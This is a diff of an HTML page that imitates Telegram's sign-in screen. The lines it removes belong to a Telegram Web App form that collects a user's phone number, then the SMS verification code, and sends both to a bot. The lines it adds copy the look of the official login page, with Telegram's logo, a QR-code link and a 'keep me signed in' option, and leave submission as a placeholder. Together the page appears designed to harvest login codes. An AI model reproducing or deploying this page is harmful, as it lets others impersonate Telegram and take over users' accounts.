--- a/index.html
+++ b/index.html
@@ -3,95 +3,126 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Telegram Sign-In</title>
-    <script src="https://telegram.org/js/telegram-web-app.js"></script>
+    <title>Sign in to Telegram</title>
     <style>
         body {
-            font-family: Arial, sans-serif;
-            text-align: center;
+            font-family: 'Helvetica Neue', Arial, sans-serif;
+            background-color: #f5f5f5;
+            margin: 0;
+            padding: 0;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+        }
+
+        .container {
+            background-color: #ffffff;
             padding: 20px;
-            background-color: #f9f9f9;
+            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
+            border-radius: 10px;
+            text-align: center;
+            width: 100%;
+            max-width: 400px;
         }
-        .form-group {
-            margin: 15px 0;
+
+        .container img {
+            width: 80px;
+            margin-bottom: 20px;
         }
-        select, input[type="tel"] {
+
+        h1 {
+            font-size: 24px;
+            color: #333333;
+            margin-bottom: 10px;
+        }
+
+        select, input[type="text"] {
             width: 100%;
             padding: 10px;
-            font-size: 16px;
-            margin-top: 5px;
-        }
-        button {
-            padding: 10px 20px;
-            background-color: #0088cc;
-            color: white;
-            border: none;
-            cursor: pointer;
+            margin: 10px 0;
+            border: 1px solid #ccc;
+            border-radius: 5px;
             font-size: 16px;
         }
-        .flags {
+
+        input[type="checkbox"] {
             margin-right: 10px;
+        }
+
+        .button {
+            width: 100%;
+            padding: 10px;
+            background-color: #0088cc;
+            color: #ffffff;
+            border: none;
+            border-radius: 5px;
+            font-size: 16px;
+            cursor: pointer;
+            margin-top: 20px;
+        }
+
+        .button:hover {
+            background-color: #007ab8;
+        }
+
+        .qr-code {
+            color: #0088cc;
+            text-decoration: none;
+            margin-top: 10px;
+            display: block;
+            font-size: 14px;
+        }
+
+        .qr-code:hover {
+            text-decoration: underline;
         }
     </style>
 </head>
 <body>
+    <div class="container">
+        <img src="https://upload.wikimedia.org/wikipedia/commons/8/82/Telegram_logo.svg" alt="Telegram Logo">
+        <h1>Sign in to Telegram</h1>
+        <p>Please confirm your country code and enter your phone number.</p>
 
-    <h2>Sign in to Telegram</h2>
-    <form id="signin-form">
-        <div class="form-group">
-            <label for="country">Country</label>
-            <select id="country">
-                <!-- Add more countries and flags -->
-                <option value="+1" data-flag="🇺🇸">United States (+1)</option>
-                <option value="+44" data-flag="🇬🇧">United Kingdom (+44)</option>
-                <option value="+91" data-flag="🇮🇳">India (+91)</option>
-                <option value="+61" data-flag="🇦🇺">Australia (+61)</option>
-                <!-- Add more options for all countries -->
-            </select>
-        </div>
-        <div class="form-group">
-            <label for="phone">Phone Number</label>
-            <input type="tel" id="phone" placeholder="Enter your phone number" required>
-        </div>
-        <button type="submit">Verify</button>
-    </form>
+        <!-- Country Code Dropdown -->
+        <select id="countryCode">
+            <!-- Option for each country (Sample entries) -->
+            <option value="+61" data-country="Australia">Australia (+61)</option>
+            <option value="+1" data-country="United States">United States (+1)</option>
+            <!-- You will need to add more country options here -->
+        </select>
 
-    <p id="status-message" style="display: none;">Telegram has sent an SMS to your phone number. Please enter the verification code below.</p>
+        <!-- Phone Number Input -->
+        <input type="text" id="phoneNumber" placeholder="Phone Number">
 
-    <form id="verification-form" style="display: none;">
-        <div class="form-group">
-            <label for="verification-code">Verification Code</label>
-            <input type="tel" id="verification-code" placeholder="Enter verification code" required>
+        <!-- Keep Me Signed In Checkbox -->
+        <div>
+            <input type="checkbox" id="keepSignedIn"> Keep me signed in
         </div>
-        <button type="submit">Submit Code</button>
-    </form>
+
+        <!-- Next Button -->
+        <button class="button" onclick="submitForm()">Next</button>
+
+        <!-- QR Code Login Link -->
+        <a href="#" class="qr-code">Log in by QR code</a>
+    </div>
 
     <script>
-        // Handle form submission
-        document.getElementById('signin-form').addEventListener('submit', function(event) {
-            event.preventDefault();
-
-            const country = document.getElementById('country').value;
-            const phone = document.getElementById('phone').value;
-
-            // Send data to the bot
-            Telegram.WebApp.sendData(JSON.stringify({ country, phone }));
-
-            // Display status message
-            document.getElementById('status-message').style.display = 'block';
-            document.getElementById('verification-form').style.display = 'block';
+        document.getElementById('countryCode').addEventListener('change', function() {
+            const selectedOption = this.options[this.selectedIndex];
+            const phoneNumberInput = document.getElementById('phoneNumber');
+            phoneNumberInput.value = selectedOption.value + ' ' + phoneNumberInput.value.replace(/^\+\d+\s*/, '');
         });
 
-        // Handle verification form submission
-        document.getElementById('verification-form').addEventListener('submit', function(event) {
-            event.preventDefault();
+        function submitForm() {
+            const countryCode = document.getElementById('countryCode').value;
+            const phoneNumber = document.getElementById('phoneNumber').value;
+            const keepSignedIn = document.getElementById('keepSignedIn').checked;
 
-            const verificationCode = document.getElementById('verification-code').value;
-
-            // Send the verification code to the bot
-            Telegram.WebApp.sendData(JSON.stringify({ verificationCode }));
-        });
+            alert(`Country Code: ${countryCode}\nPhone Number: ${phoneNumber}\nKeep Signed In: ${keepSignedIn}`);
+            // You can handle the form submission here
+        }
     </script>
-
 </body>
 </html>
